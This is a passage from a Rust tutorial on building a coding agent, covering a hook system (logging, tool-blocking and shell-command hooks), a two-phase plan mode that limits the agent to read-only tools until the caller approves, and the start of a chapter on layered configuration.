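The event-to-string formatting itself is a straightforward match. Here is a sketch with a plain enum standing in for the starter's HookEvent (which also carries args and results):

```rust
// Pared-down HookEvent: just enough fields to show the formatting.
enum HookEvent {
    PreToolCall { tool_name: String },
    PostToolCall { tool_name: String },
    AgentStart,
    AgentEnd,
}

fn describe(event: &HookEvent) -> String {
    match event {
        HookEvent::PreToolCall { tool_name } => format!("pre:{tool_name}"),
        HookEvent::PostToolCall { tool_name } => format!("post:{tool_name}"),
        HookEvent::AgentStart => "agent:start".to_string(),
        HookEvent::AgentEnd => "agent:end".to_string(),
    }
}

fn main() {
    let e = HookEvent::PreToolCall { tool_name: "bash".into() };
    assert_eq!(describe(&e), "pre:bash");
    assert_eq!(describe(&HookEvent::AgentEnd), "agent:end");
}
```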

BlockingHook

#![allow(unused)]
fn main() {
pub struct BlockingHook {
    blocked_tools: Vec<String>,
    reason: String,
}

impl BlockingHook {
    pub fn new(blocked_tools: Vec<String>, reason: impl Into<String>) -> Self {
        Self {
            blocked_tools,
            reason: reason.into(),
        }
    }
}

#[async_trait]
impl Hook for BlockingHook {
    async fn on_event(&self, event: &HookEvent) -> HookAction {
        if let HookEvent::PreToolCall { tool_name, .. } = event {
            if self.blocked_tools.iter().any(|b| b == tool_name) {
                return HookAction::Block(self.reason.clone());
            }
        }
        HookAction::Continue
    }
}
}

A policy hook: it takes a list of tool names and blocks any PreToolCall event that matches. Everything else -- PostToolCall, AgentStart, AgentEnd, and pre-tool events for tools not on the list -- passes through as Continue.

The pattern match is deliberate. The hook only inspects PreToolCall events. On a PostToolCall for a blocked tool, it does nothing -- the tool has already run and blocking would be meaningless. This is the asymmetry from the event model table above, enforced in code.

You could use BlockingHook to implement workspace-level policies. For example, a read-only project might block write, edit, and bash:

#![allow(unused)]
fn main() {
let hook = BlockingHook::new(
    vec!["write".into(), "edit".into(), "bash".into()],
    "this workspace is read-only",
);
}

The LLM would see the block reason in the tool result and switch to read-only tools for the rest of the session.

ShellHook

#![allow(unused)]
fn main() {
pub struct ShellHook {
    command: String,
    tool_pattern: Option<glob::Pattern>,
}

impl ShellHook {
    pub fn new(command: impl Into<String>) -> Self {
        Self {
            command: command.into(),
            tool_pattern: None,
        }
    }

    pub fn for_tool(mut self, pattern: &str) -> Self {
        self.tool_pattern = glob::Pattern::new(pattern).ok();
        self
    }

    fn matches_tool(&self, tool_name: &str) -> bool {
        match &self.tool_pattern {
            Some(pattern) => pattern.matches(tool_name),
            None => true,
        }
    }
}
}

The ShellHook bridges the gap between Rust code and external commands. Instead of implementing policy in Rust, it delegates to a shell command. The command signals its decision through its exit code.

The for_tool builder method restricts which tools the hook fires for, using a glob pattern. Without it, the hook fires for all tools. ShellHook::new("cargo fmt --check").for_tool("write") only fires when the write tool is called.

The on_event implementation handles PreToolCall and PostToolCall events:

#![allow(unused)]
fn main() {
#[async_trait]
impl Hook for ShellHook {
    async fn on_event(&self, event: &HookEvent) -> HookAction {
        // Only handle PreToolCall and PostToolCall events
        // Check matches_tool() first
        // Run: tokio::process::Command::new("sh").arg("-c").arg(&self.command).output()
        // Exit code 0 -> Continue, non-zero -> Block with stderr
        unimplemented!()
    }
}
}

The execution flow:

  1. Extract tool name. Only PreToolCall and PostToolCall events are handled. AgentStart and AgentEnd return Continue immediately.

  2. Check the tool pattern. If a tool_pattern is set and does not match the tool name, return Continue.

  3. Run the command. Uses tokio::process::Command to spawn sh -c <command>.

  4. Interpret the exit code. A non-zero exit means "block this call." The stderr is captured and included in the block reason. A zero exit means Continue.

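Steps 3 and 4 can be sketched synchronously, with std::process::Command in place of tokio::process::Command (the decision logic is identical):

```rust
use std::process::Command;

// Run `sh -c <command>` and turn the exit code into a hook decision:
// Ok(()) means Continue, Err(reason) means Block with stderr as reason.
fn run_hook_command(command: &str) -> Result<(), String> {
    let output = Command::new("sh")
        .arg("-c")
        .arg(command)
        .output()
        .map_err(|e| format!("failed to spawn hook: {e}"))?;
    if output.status.success() {
        Ok(())
    } else {
        Err(String::from_utf8_lossy(&output.stderr).trim().to_string())
    }
}

fn main() {
    // Exit 0 -> Continue.
    assert!(run_hook_command("true").is_ok());
    // Non-zero exit -> Block, carrying stderr as the reason.
    let err = run_hook_command("echo nope >&2; exit 1").unwrap_err();
    assert_eq!(err, "nope");
}
```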
Here is a concrete example. Run a format check after every file write:

#![allow(unused)]
fn main() {
let hook = ShellHook::new("cargo fmt --check")
    .for_tool("write");
}

How Claude Code does it

Claude Code's hook system shares the same event-driven architecture but is configured declaratively through settings.json rather than Rust code.

In Claude Code, hooks are defined as JSON objects with matchers and commands:

{
  "hooks": {
    "PreToolUse": [
      {
        "matcher": "bash",
        "command": "/path/to/check-bash-command.sh"
      }
    ],
    "PostToolUse": [
      {
        "matcher": "*",
        "command": "echo 'Tool $TOOL_NAME completed'"
      }
    ]
  }
}

The matcher field supports glob patterns against tool names. The command field is a shell command that receives context through environment variables -- the same pattern as our ShellHook. Non-zero exits on pre-tool hooks block the call. Claude Code's hooks can also modify tool arguments by writing JSON to stdout, which the agent parses and applies.

Our trait-based approach provides the same extensibility through a different mechanism. Instead of JSON configuration, hooks are Rust types that implement the Hook trait. This gives us compile-time type safety and the ability to write hooks with complex logic (the BlockingHook matches against a list of tool names; the LoggingHook records structured events). The trade-off is that adding a new hook requires writing Rust code rather than editing a config file.

The ShellHook bridges this gap -- it delegates to external commands just like Claude Code's JSON-configured hooks do. A production agent would likely combine both approaches: built-in hooks for core policies (implemented in Rust) and shell hooks for user-defined customization (configured at runtime).


Tests

Run the hook system tests:

cargo test -p mini-claw-code-starter hooks

Key tests:

  • test_hooks_logging_hook -- LoggingHook records "pre:bash" for a PreToolCall event and returns Continue.
  • test_hooks_logging_hook_multiple_events -- LoggingHook records all four event types in order: ["agent:start", "pre:read", "post:read", "agent:end"].
  • test_hooks_blocking_hook -- BlockingHook returns Block("bash is disabled") for a bash PreToolCall.
  • test_hooks_blocking_hook_allows_other_tools -- BlockingHook returns Continue for tools not in the blocked list.
  • test_hooks_registry_dispatch_continue -- Registry with only a LoggingHook returns Continue.
  • test_hooks_registry_dispatch_block -- Registry with LoggingHook then BlockingHook returns Block for bash.
  • test_hooks_registry_multiple_hooks_order -- Both hooks in a two-hook registry are called for a non-blocked event.
  • test_hooks_registry_block_short_circuits -- When a BlockingHook fires, hooks registered after it are never called.
  • test_hooks_registry_is_empty -- Verifies is_empty() before and after registration.
  • test_hooks_post_tool_event -- LoggingHook correctly formats PostToolCall events as "post:write".

Key takeaway

The hook system is an event bus with three possible responses: observe (Continue), intervene (Block), or transform (ModifyArgs). Registration order determines priority, and Block short-circuits immediately. This gives users a clean extension point for custom policies without modifying the agent's core loop.


Recap

This chapter added an event-driven hook system that lets external code observe, modify, and block agent behavior at runtime:

  • HookEvent defines four lifecycle points: AgentStart, PreToolCall, PostToolCall, and AgentEnd. Each carries the context relevant to its point in the agent loop.

  • HookAction defines three responses: Continue (proceed normally), Block (cancel the tool call with a reason), and ModifyArgs (replace the tool arguments). The asymmetry between pre and post events is enforced in the hook implementations -- only pre-tool hooks can meaningfully block.

  • HookRegistry dispatches events to hooks sequentially. Block short-circuits immediately. ModifyArgs accumulates (last writer wins). Continue is the default for an empty registry.

  • LoggingHook records a short string description of every event ("pre:bash", "agent:end") in a Mutex<Vec<String>> for debugging and testing. It never interferes with execution.

  • BlockingHook blocks specific tools by name on PreToolCall events. It ignores everything else.

  • ShellHook delegates to an external shell command via tokio::process::Command. Non-zero exits block the call. The for_tool() method restricts which tools trigger the command using glob::Pattern.

The hook system completes the safety and control layer. The permission engine (Chapter 13) enforces mode-based access rules. Safety checks (Chapter 14) catch dangerous patterns statically. Hooks (this chapter) provide the escape hatch for policies that are too specific or too dynamic to hardcode.


What's next

Chapter 16 -- Plan Mode -- ties together everything from Part III. Plan mode is a restricted execution mode where only read-only tools run. The agent can read files, search code, and reason about a task, but it cannot write, edit, or execute commands. The permission engine checks tool categories. Safety checks validate arguments. Hooks fire for observation. But nothing destructive happens. It is the ultimate guardrail: the agent plans, the user reviews, and only then does execution begin.


Chapter 16: Plan Mode

File(s) to edit: src/planning.rs Test to run: cargo test -p mini-claw-code-starter plan Estimated time: 50 min

Your agent can now read files, write code, run shell commands, and do all of it under a permission system with safety checks and hooks. There is one problem: it does everything at once. The model reads a file, immediately rewrites it, runs the tests, and keeps going -- all in a single uninterrupted loop. If the model misunderstands the task, it has already modified your codebase before you had a chance to say "wait, that is not what I meant."

Plan mode fixes this by splitting the agent loop into two phases. First, the agent analyzes the task using only read-only tools -- reading files, searching code, listing directories. It produces a plan. Then, the caller (you, or your UI) inspects the plan, approves it, and the agent executes with all tools available. Think before you act. It is advice that works for humans and agents alike.

This pattern is not hypothetical. Claude Code ships with a plan mode that restricts the agent to read-only operations until the user explicitly approves the plan. Every serious coding agent has some version of this -- a way to let the model reason about a task before committing to changes. The idea of distinguishing read-only tools from destructive ones, introduced back in Chapter 12, has been waiting for exactly this moment.

cargo test -p mini-claw-code-starter plan

Goal

  • Build a PlanAgent with two distinct phases: plan() (read-only tools only) and execute() (all tools available).
  • Implement the exit_plan virtual tool that lets the LLM explicitly signal "I am done planning" without requiring a StopReason::Stop.
  • Enforce two layers of write protection during planning: filter tool definitions so the LLM does not see write tools, and block write tool calls at execution time as a fallback.
  • Maintain message continuity between phases so the execution phase has full context from the planning phase.

Why a separate agent?

You could implement plan mode as a flag on SimpleAgent -- add a plan_mode: bool field, check it in execute_tools, filter definitions accordingly. That works but tangles two concerns. The SimpleAgent is the general-purpose agent loop. Plan mode is a higher-level workflow with distinct phases, transitions, and a virtual tool that does not exist in the tool set. Mixing them muddies both.

The PlanAgent is a separate struct that wraps the same building blocks -- a provider, a ToolSet -- but orchestrates them differently. Two methods, plan() and execute(), implement the two phases. The caller controls the transition between them. This keeps the SimpleAgent simple and gives the PlanAgent full control over its workflow.

Claude Code takes a similar approach. Its plan mode sets PermissionMode::Plan, which the permission engine enforces (only read-only tools pass). The UI shows a "Plan Mode" banner and the agent's plan before asking for approval. Our PlanAgent encapsulates the same two-phase pattern with caller-driven approval.


The PlanAgent struct

#![allow(unused)]
fn main() {
use std::collections::HashSet;

use tokio::sync::mpsc;

use crate::agent::{AgentEvent, tool_summary};
use crate::streaming::{StreamEvent, StreamProvider};
use crate::types::*;

pub struct PlanAgent<P: StreamProvider> {
    provider: P,
    tools: ToolSet,
    read_only: HashSet<&'static str>,
    plan_system_prompt: String,
    exit_plan_def: ToolDefinition,
}
}

Five fields, each with a clear role:

  • provider -- The LLM backend. Note the StreamProvider bound -- the PlanAgent uses streaming internally for the plan/execute loop.
  • tools -- The full tool set. During planning, only a subset is exposed. During execution, all tools are available.
  • read_only -- An explicit set of tool names allowed during planning. Only the listed tools are available during the plan phase.
  • plan_system_prompt -- The system prompt injected during planning. A default is provided via the DEFAULT_PLAN_PROMPT constant.
  • exit_plan_def -- The ToolDefinition for the virtual exit_plan tool. This tool is injected into the plan phase's tool list but does not exist in the ToolSet. It is a signal, not a real tool.

The builder

The builder follows the same new() + chaining pattern as SimpleAgent. The new() constructor creates the exit_plan_def with a description that tells the model what it does. This definition has no parameters -- the model just calls it to signal "I am done planning."

#![allow(unused)]
fn main() {
let agent = PlanAgent::new(provider)
    .tool(ReadTool::new())
    .tool(WriteTool::new())
    .read_only(&["read"])
    .plan_prompt("You are a security auditor.");
}

Two builder methods are specific to PlanAgent:

  • read_only(&[&'static str]) -- Sets the tool names allowed during planning. If you call .read_only(&["bash", "read"]), only bash and read are available during planning. This is useful for specialized workflows where you want the agent to run commands (like git log or cargo test --dry-run) during analysis.

  • plan_prompt(impl Into<String>) -- Replaces the default planning system prompt. The default says "You are in PLANNING MODE. Explore the codebase using the available tools and create a plan." A custom prompt can focus the agent on a specific concern: security auditing, performance analysis, migration planning.


The two phases

The core of PlanAgent is two methods: plan() and execute(). They share the same loop structure as the SimpleAgent's chat(), but with different tool sets and different termination conditions. Both methods also take an mpsc::UnboundedSender<AgentEvent> for streaming events back to the caller.

flowchart LR
    A["User prompt"] --> B["plan()<br/>read-only tools<br/>+ exit_plan"]
    B --> C["Plan text"]
    C --> D{"Caller<br/>approves?"}
    D -->|Yes| E["Push approval<br/>message"]
    D -->|No| F["Push feedback<br/>message"]
    F --> B
    E --> G["execute()<br/>all tools"]
    G --> H["Final result"]

The caller drives the transition. After plan() returns, the caller can:

  1. Show the plan to the user
  2. Push a Message::user("Approved. Go ahead.") into the message history
  3. Call execute() with the same message vec

Or the caller can reject the plan, push feedback, and call plan() again. The PlanAgent does not care -- it has no built-in UI, no approval dialog. It is a workflow agent, not a user interface.


Phase 1: plan()

The planning phase runs a restricted agent loop. Only read-only tools and the virtual exit_plan tool are available. Both plan() and execute() delegate to a shared run_loop() method:

#![allow(unused)]
fn main() {
pub async fn plan(
    &self,
    messages: &mut Vec<Message>,
    events: mpsc::UnboundedSender<AgentEvent>,
) -> anyhow::Result<String> {
    // Inject system prompt if needed
    // Call run_loop with Some(&self.read_only)
    unimplemented!()
}

pub async fn execute(
    &self,
    messages: &mut Vec<Message>,
    events: mpsc::UnboundedSender<AgentEvent>,
) -> anyhow::Result<String> {
    // Call run_loop with None (no restrictions)
    unimplemented!()
}
}

The run_loop() method is the shared agent loop: when allowed is Some, only those tools plus exit_plan are permitted; when allowed is None, all tools are available. Here is the full implementation:

#![allow(unused)]
fn main() {
async fn run_loop(
    &self,
    messages: &mut Vec<Message>,
    allowed: Option<&HashSet<&'static str>>,
    events: mpsc::UnboundedSender<AgentEvent>,
) -> anyhow::Result<String> {
    // Step 1: filter tool definitions
    let all_defs = self.tools.definitions();
    let defs: Vec<&ToolDefinition> = match allowed {
        Some(names) => {
            let mut filtered: Vec<&ToolDefinition> = all_defs
                .into_iter()
                .filter(|d| names.contains(d.name))
                .collect();
            filtered.push(&self.exit_plan_def);
            filtered
        }
        None => all_defs,
    };

    loop {
        // Step 2: stream the LLM response (forward text deltas to UI)
        let (stream_tx, mut stream_rx) = mpsc::unbounded_channel();
        let events_clone = events.clone();
        let forwarder = tokio::spawn(async move {
            while let Some(event) = stream_rx.recv().await {
                if let StreamEvent::TextDelta(ref text) = event {
                    let _ = events_clone.send(AgentEvent::TextDelta(text.clone()));
                }
            }
        });

        let turn = self.provider.stream_chat(messages, &defs, stream_tx).await?;
        let _ = forwarder.await;

        // Step 3: match on stop reason
        match turn.stop_reason {
            StopReason::Stop => {
                let text = turn.text.clone().unwrap_or_default();
                let _ = events.send(AgentEvent::Done(text.clone()));
                messages.push(Message::Assistant(turn));
                return Ok(text);
            }
            StopReason::ToolUse => {
                let mut results = Vec::with_capacity(turn.tool_calls.len());

                for call in &turn.tool_calls {
                    // Handle exit_plan
                    if allowed.is_some() && call.name == "exit_plan" {
                        let text = turn.text.clone().unwrap_or_default();
                        let _ = events.send(AgentEvent::Done(text.clone()));
                        // Clone here: `turn` is still borrowed by the loop
                        // iterator, so it cannot be moved into the history yet.
                        messages.push(Message::Assistant(turn.clone()));
                        messages.push(Message::ToolResult {
                            id: call.id.clone(),
                            content: "Plan submitted for review.".into(),
                        });
                        return Ok(text);
                    }

                    // Block tools not in allowed set
                    if let Some(names) = allowed {
                        if !names.contains(call.name.as_str()) {
                            results.push((
                                call.id.clone(),
                                format!("error: tool `{}` is not available in planning mode",
                                    call.name),
                            ));
                            continue;
                        }
                    }

                    // Execute allowed tools
                    let content = match self.tools.get(&call.name) {
                        Some(t) => t.call(call.arguments.clone()).await
                            .unwrap_or_else(|e| format!("error: {e}")),
                        None => format!("error: unknown tool `{}`", call.name),
                    };
                    results.push((call.id.clone(), content));
                }

                messages.push(Message::Assistant(turn));
                for (id, content) in results {
                    messages.push(Message::ToolResult { id, content });
                }
            }
        }
    }
}
}

The structure mirrors the SimpleAgent's chat loop. Same loop, same provider call, same stop-reason match. But the PlanAgent uses streaming internally via StreamProvider, and three things are different:

1. System prompt injection

Before entering the loop, plan() injects the planning system prompt at position 0 of the message history (if not already present), telling the model it is in planning mode.

2. Filtered tool definitions

The plan phase filters tool definitions to only include tools in the read_only set, plus the exit_plan tool. The model cannot see write tools in its schema, so it has no reason to call them.

3. The exit_plan escape hatch

When the model calls exit_plan, the plan phase ends immediately. The loop pushes the assistant message and a synthetic tool result ("Plan submitted for review.") into the history, then returns. The synthetic result is necessary because the API requires every tool call to have a corresponding result -- without it, the next provider call would fail.

The plan phase can end in two ways:

  • StopReason::Stop -- The model produces a text response directly. This is the implicit exit.
  • exit_plan tool call -- The model explicitly signals it is done analyzing. This is the explicit exit.

Both return the plan text (which may be empty if the model put its plan in tool calls rather than text).


The exit_plan tool

The exit_plan tool deserves its own section because it is unusual. It is not a real tool. It does not exist in the ToolSet. It has no call() method. It is a ToolDefinition with a name and description, injected into the plan phase's tool list so the model sees it as an option.

Why not just rely on StopReason::Stop? In principle you could: tell the model "when you are done planning, emit your plan as plain text and stop." In practice this fights against two behaviours baked into most instruction-tuned models.

  1. When tools are visible, models keep using them. Present a model with read, glob, grep, and a user prompt, and it will happily spend ten turns exploring the codebase before producing any narrative output. There is no natural stopping gradient -- one more grep is always plausible. Without a deliberate stopping signal, the plan phase drags on.
  2. Plain-text stops are easy to mistake for partial work. A model that ends a turn with "Next, I need to check how X is wired" is signalling "I am still working" even when stop_reason == Stop. The caller cannot easily distinguish a finished plan from a mid-thought pause.

exit_plan sidesteps both problems. It is a tool the model must actively choose to call, which reads as an explicit commitment ("I am ready"). The definition takes no parameters -- the plan is the assistant text that accompanies the call -- so the plan and the stop signal arrive in the same structured message. And because it lives in the same tool-call slot the model is already used to, the behaviour composes naturally with the rest of the loop. It is a social contract expressed as a tool schema.

When the model calls exit_plan, the loop detects it by name, pushes the assistant message, finds the call's ID, and pushes a synthetic ToolResult with "Plan submitted for review." The synthetic result is important -- the message protocol requires every ToolCall to have a matching ToolResult. Skip it and the next API call fails with a malformed request.
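The pairing invariant -- every ToolCall must have a matching ToolResult -- can be checked mechanically. A minimal sketch with hypothetical simplified message types (not the starter's actual Message enum):

```rust
// Hypothetical stripped-down message shapes, just enough to show the
// call/result pairing rule that the synthetic result preserves.
#[derive(Debug)]
enum Msg {
    Assistant { tool_call_ids: Vec<String> },
    ToolResult { id: String },
}

// A history is valid when every tool call id emitted by an assistant
// message has been answered by a ToolResult with the same id.
fn history_is_valid(history: &[Msg]) -> bool {
    let mut pending: Vec<&String> = Vec::new();
    for msg in history {
        match msg {
            Msg::Assistant { tool_call_ids } => pending.extend(tool_call_ids),
            Msg::ToolResult { id } => pending.retain(|p| *p != id),
        }
    }
    pending.is_empty()
}

fn main() {
    let history = vec![
        Msg::Assistant { tool_call_ids: vec!["call_1".into()] },
        // The synthetic "Plan submitted for review." result pairs with call_1.
        Msg::ToolResult { id: "call_1".into() },
    ];
    assert!(history_is_valid(&history));
    println!("ok");
}
```

Drop the synthetic result and `history_is_valid` returns false -- which is exactly the state that makes the next real API call fail with a malformed request.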


Phase 2: execute()

The execution phase is a standard agent loop with the full tool set. No filtering, no virtual tools, no special termination. The execute() method calls run_loop(messages, None, events) -- passing None for the allowed set means all tools are available.

The key point: execute() receives the same &mut Vec<Message> that plan() used. The message history from planning -- the system prompt, the user request, the read-only tool calls, the plan text -- is all still there. The model enters execution with full context of what it analyzed and what it decided to do. This continuity is what makes the two-phase pattern effective. The model does not start from scratch; it picks up where it left off.

Between plan() and execute(), the caller typically pushes a user message:

#![allow(unused)]
fn main() {
let (tx, _rx) = mpsc::unbounded_channel();
let plan = agent.plan(&mut messages, tx.clone()).await?;
println!("Plan: {plan}");

// User approves
messages.push(Message::user("Approved. Go ahead."));

let result = agent.execute(&mut messages, tx).await?;
}

This approval message becomes part of the context for execution. The model sees it and knows it has permission to proceed with modifications.


Defense in depth: tool filtering

The plan phase uses two layers of protection to prevent write operations:

Layer 1: Definition filtering

The run_loop method filters the tool schemas sent to the model when an allowed set is provided. Only tools whose names are in the set are included, plus exit_plan.

If the model does not see a tool in its schema, it has no reason to call it. This is the primary defense -- remove the temptation.

Layer 2: Execution guard

Even if the model somehow requests a blocked tool (hallucination, prompt injection, or a creative interpretation of the schema), the run_loop method catches it. For each tool call, three things happen:

  1. exit_plan is handled specially -- When the model calls exit_plan, the loop returns the plan text immediately. A synthetic tool result is pushed so the message history stays valid.

  2. Blocked tools return errors -- If a tool is not in the allowed set, the tool is not executed. Instead, an error string is returned to the model. The model sees this error, understands the constraint, and adjusts.

  3. Allowed tools execute normally -- Lookup, call, return result. The same pipeline as the SimpleAgent's tool execution.

Both layers must fail for a write operation to slip through during planning.
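The two layers can be sketched side by side. This is a standalone illustration with hypothetical minimal types, not the starter's run_loop -- layer 1 shrinks the schema the model sees, layer 2 rejects anything that slips past it:

```rust
use std::collections::HashSet;

// Hypothetical minimal tool definition -- stands in for ToolDefinition.
struct ToolDef {
    name: &'static str,
}

// Layer 1: definition filtering. Only allowed tools appear in the schema.
fn filter_defs<'a>(all: &'a [ToolDef], allowed: &HashSet<&'static str>) -> Vec<&'a ToolDef> {
    all.iter().filter(|d| allowed.contains(d.name)).collect()
}

// Layer 2: execution guard. A requested call outside the allowed set is
// turned into an error string instead of being executed.
fn guard(call_name: &str, allowed: &HashSet<&'static str>) -> Result<(), String> {
    if allowed.contains(call_name) {
        Ok(())
    } else {
        Err(format!("error: tool `{call_name}` is not available in planning mode"))
    }
}

fn main() {
    let allowed: HashSet<&'static str> = ["read"].into_iter().collect();
    let all = [ToolDef { name: "read" }, ToolDef { name: "write" }];

    // Layer 1: write is not even in the schema the model sees.
    assert_eq!(filter_defs(&all, &allowed).len(), 1);

    // Layer 2: even a hallucinated write call is rejected, not executed.
    assert!(guard("write", &allowed).is_err());
    assert!(guard("read", &allowed).is_ok());
    println!("ok");
}
```

The error string from layer 2 goes back to the model as a tool result, so the model learns the constraint instead of the loop crashing.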

Key Rust concept: HashSet<&'static str> for zero-cost string sets

The read_only field uses &'static str rather than String. This means the set contains references to string literals that live for the entire program -- no heap allocation, no cloning. The 'static lifetime tells the compiler these strings never become invalid, which is always true for string literals like "read" or "bash". The trade-off is that you can only put compile-time-known strings into the set, not dynamically generated ones. For tool names, which are always known at compile time, this is the ideal choice.
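A quick demonstration of the trade-off described above, using arbitrary tool names:

```rust
use std::collections::HashSet;

fn main() {
    // The set stores &'static str references to literals baked into the
    // binary -- collecting allocates the HashSet itself, not the strings.
    let read_only: HashSet<&'static str> = ["read", "glob", "grep"].into_iter().collect();
    assert!(read_only.contains("read"));
    assert!(!read_only.contains("write"));

    // A String built at runtime does not live for 'static, so it cannot go
    // into this set -- only compile-time-known names fit the design. For
    // tool names, which are always literals, that constraint costs nothing.
    println!("ok");
}
```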

The read_only set

The read_only field is a HashSet<&'static str> containing the tool names allowed during planning. It is set via the read_only() builder method:

#![allow(unused)]
fn main() {
pub fn read_only(mut self, names: &[&'static str]) -> Self {
    self.read_only = names.iter().cloned().collect();
    self
}
}

Unlike the reference implementation, which can fall back to checking is_read_only() flags on tools, the starter requires you to explicitly name the allowed tools. This is simpler -- there are no is_read_only() or is_destructive() methods on the Tool trait in the starter.


System prompt injection

The plan phase injects a system message to tell the model it is in planning mode. This is handled by maybe_inject_plan_prompt():

#![allow(unused)]
fn main() {
fn maybe_inject_plan_prompt(&self, messages: &mut Vec<Message>) {
    // Don't inject if a system message already exists
    let has_system = messages
        .first()
        .is_some_and(|m| matches!(m, Message::System(_)));

    if !has_system {
        messages.insert(0, Message::System(self.plan_system_prompt.clone()));
    }
}
}

Three design decisions here:

  1. Respect existing system prompts -- The method checks whether any Message::System is already present at position 0. If the caller already set a system prompt (e.g., "You are a security auditor"), plan mode respects it rather than overwriting it. If plan() is called twice, the second call finds the existing message and skips injection.

  2. Position 0 -- The planning prompt is inserted at the beginning of the message list, before any existing messages. System prompts at position 0 have the strongest influence on model behavior.

  3. Custom or default -- If plan_prompt() was called on the builder, that text is used. Otherwise, the default tells the model it is in planning mode, should use read-only tools, and should call exit_plan when done.


The full plan-execute flow

Let's trace through a realistic scenario to see how everything fits together. The user wants to copy a source file to a new location.

Setup:

#![allow(unused)]
fn main() {
let engine = PlanAgent::new(provider)
    .tool(ReadTool::new())
    .tool(WriteTool::new());

let mut messages = vec![Message::user("Copy src.txt to dst.txt")];
}

Plan phase -- plan() injects the planning system prompt, filters definitions to [read, exit_plan] (write is excluded), and enters the loop. The model calls read(path="src.txt"), sees the contents, and returns "I'll copy src.txt to dst.txt."

Approval -- The caller prints the plan and pushes a user message:

#![allow(unused)]
fn main() {
println!("Plan: {}", plan);
messages.push(Message::user("Approved. Go ahead."));
}

Execute phase -- execute() exposes all tools. The model calls write(path="dst.txt", content="source content"), the file is created on disk, and the model returns "Done! Copied the file."

The message history at the end contains the complete trace: planning system prompt, user request, read-only analysis, plan text, approval, write operation, final confirmation. The model had full context at every step.


Event streaming

Like SimpleAgent's run_with_events(), the PlanAgent streams events as it works. Both plan() and execute() take an mpsc::UnboundedSender<AgentEvent> and emit ToolCall, TextDelta, Done, and Error events as the phase runs.

A TUI would use this to show a spinner while the agent reads files during planning, display the plan text as it streams, and prompt the user for approval before calling execute().


How Claude Code does it

Claude Code's plan mode follows the same two-phase pattern but integrates more deeply with the permission system.

Feature         | Our PlanAgent                        | Claude Code
Tool filtering  | Explicit read-only set               | PermissionMode::Plan flag
UI integration  | Caller-driven (no built-in UI)       | "Plan Mode" banner in TUI
Approval flow   | Caller pushes user message           | UI dialog with approve/reject
System prompt   | Injected plan system prompt          | Mode-specific prompt section
Exit signal     | exit_plan virtual tool               | Mode transition in permission engine
Write blocking  | Two layers (definitions + execution) | Permission engine rejects non-read-only

The biggest difference is where the enforcement happens. In Claude Code, the permission engine handles it -- plan mode is just another permission mode that rejects non-read-only tool calls. The SimpleAgent does not need to know about plan mode at all. Our approach is simpler and self-contained: everything about plan mode lives in one struct, at the cost of less flexibility for "semi-plan" modes that allow some writes but not others.


Tests

Run the plan mode tests:

cargo test -p mini-claw-code-starter plan

Key tests:

  • test_plan_plan_text_response -- Plan phase returns text directly when the LLM responds with StopReason::Stop.
  • test_plan_plan_with_read_tool -- Plan phase allows read tool calls and returns the plan text.
  • test_plan_plan_blocks_write_tool -- Plan phase blocks write tool calls, returns error to LLM, and verifies the file was not created on disk.
  • test_plan_plan_blocks_edit_tool -- Plan phase blocks edit tool calls and the original file remains unchanged.
  • test_plan_execute_allows_write_tool -- Execute phase permits writes and the file is created on disk.
  • test_plan_full_plan_then_execute -- Complete two-phase flow: plan reads a file, execution writes to a new file.
  • test_plan_message_continuity -- Message history grows correctly across plan and execute phases (system + user + assistant messages accumulate).
  • test_plan_read_only_override -- Custom read_only(&["read"]) excludes bash from the plan phase.
  • test_plan_streaming_events_during_plan -- Plan phase emits TextDelta and Done events through the channel.
  • test_plan_exit_plan_tool -- The virtual exit_plan tool ends planning and injects a synthetic tool result.
  • test_plan_system_prompt_injected -- Plan phase inserts a PLANNING MODE system message at position 0.
  • test_plan_system_prompt_not_duplicated -- Calling plan() twice does not duplicate the system prompt.
  • test_plan_exit_plan_not_in_execute -- During execute, exit_plan is treated as an unknown tool.
  • test_plan_custom_plan_prompt -- Custom plan prompt replaces the default planning instructions.
  • test_plan_full_flow_with_exit_plan -- End-to-end: read during planning, exit_plan, approve, write during execution.

Key takeaway

Plan mode is caller-driven separation of concerns: the agent analyzes with read-only tools first, the caller reviews and approves, then the agent executes with the full tool set. The same message history flows through both phases, giving the execution phase complete context from the planning phase.


Recap

Plan mode completes Part III -- Safety & Control. Over four chapters you built the layers that turn a reckless agent into a disciplined one:

  • Chapter 13: Permission Engine -- Checks every tool call against permission rules before execution. Ask, allow, or deny based on the tool and the mode.
  • Chapter 14: Safety Checks -- Static analysis of tool arguments. Catches dangerous patterns before the permission prompt appears.
  • Chapter 15: Hook System -- Pre-tool and post-tool hooks for custom policies. Run linters after edits, block certain paths, enforce project rules.
  • Chapter 16: Plan Mode -- A two-phase workflow that separates analysis from action. The agent reads and reasons first, then modifies only after approval.

The key architectural insight is caller-driven approval. The PlanAgent does not prompt the user, display a dialog, or make assumptions about the UI. It runs the plan, returns the text, and waits. The caller decides what to do next. This separation of concerns -- engine logic vs. user interaction -- is what makes the same PlanAgent work in a CLI, a TUI, a web interface, or a test harness.


What's next

Part III gave your agent safety and control. Part IV -- Configuration -- builds the systems that make your agent project-aware:

  • Chapter 17: Settings Hierarchy -- Layered configuration from global defaults to project-specific overrides.
  • Chapter 18: Project Instructions -- Loading and assembling CLAUDE.md files that tell the agent how to work with this specific codebase.

The safety infrastructure you built in Part III protects the agent from doing harm. The configuration infrastructure in Part IV teaches it to do good.


Chapter 17: Settings Hierarchy

File(s) to edit: src/config.rs, src/usage.rs Tests to run: cargo test -p mini-claw-code-starter config (Config, ConfigLoader), cargo test -p mini-claw-code-starter cost_tracker (CostTracker) Estimated time: 60 min

Your agent works. It reads files, writes code, runs commands, checks permissions, enforces safety rules, and restricts itself in plan mode. But every one of those behaviors is hardcoded. The model name is a string literal. The blocked commands list is baked into the source. The maximum context window is a constant. If you want to change any of them, you recompile.

Real tools do not work this way. A developer using Claude Code on a Rust project wants different settings than one working on a Python monorepo. A CI pipeline needs different defaults than an interactive session. A user who routes through a self-hosted proxy needs a different base URL. The agent must be configurable -- and the configuration must come from multiple sources, layered by priority, so that user settings override project settings, and environment variables override everything.

This chapter builds a four-level configuration hierarchy and a cost tracker. By the end, both test suites should pass: config (Config, ConfigLoader) and cost_tracker (CostTracker).

cargo test -p mini-claw-code-starter config  # Config, ConfigLoader
cargo test -p mini-claw-code-starter cost_tracker  # CostTracker

Goal

  • Define a Config struct with serde defaults so that partial TOML files deserialize into complete configurations.
  • Define a ConfigOverlay struct whose fields are Option<T>, so the loader can tell "field not set in the TOML" apart from "field explicitly set to the default value."
